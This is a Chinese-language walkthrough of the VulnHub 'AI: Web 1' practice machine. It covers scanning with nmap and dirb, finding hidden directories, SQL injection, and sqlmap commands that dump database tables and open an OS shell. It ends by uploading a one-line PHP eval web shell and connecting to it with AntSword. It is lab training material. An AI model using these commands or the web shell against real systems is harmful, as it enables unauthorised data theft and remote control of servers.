靶机地址:
https://www.vulnhub.com/entry/ai-web-1,353/攻击机:kali
首先虚拟机建一个A1web 1.0靶机 切换nat模式 然后kali扫描
nmap -sV ip段 0/24 扫描出ip进行访问

访问没有什么信息
使用dirb 对网页进一步扫描

扫描出来地址进行访问

尝试发现robots.txt中有内容

访问发现/m3diNf0/不能正常访问

发现/se3reTdir777/uploads/也不能访问页面

使用dirb 对/m3diNf0和/se3reTdir777扫描


发现一个网址访问发现是phpinfo页面

继续扫/se3reTdir777


访问index.php

发现是查询页面 考虑sql注入 输入’报错发现sql注入漏洞

通过抓包得到注入点uid=1&Operation=Submit
使用sqlmap注入页面为http://192.168.77.134/se3reTdir777/index.php
注入点为uid=1&Operation=Submit--dbs 列出数据库
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

得到了aiweb1 information_schema 两个数据库 -D 指定数据库 aiweb1 --tables 列出表名
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

得到 user systemUser 两个表名 再通过-T 指定表名user --columns 列出字段
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

得到 firstName id lastName 3个字段 再-C 指定字段 id --dump 获取字段中的数据
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

获取shell:
sqlmap -u "http://192.168.77.134/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell

选2自定义路径 连接成功

上传一句话木马
<?php @eval($_POST['cmd'])?>

上传成功

访问使用蚁剑连接

连接成功并添加得到信息
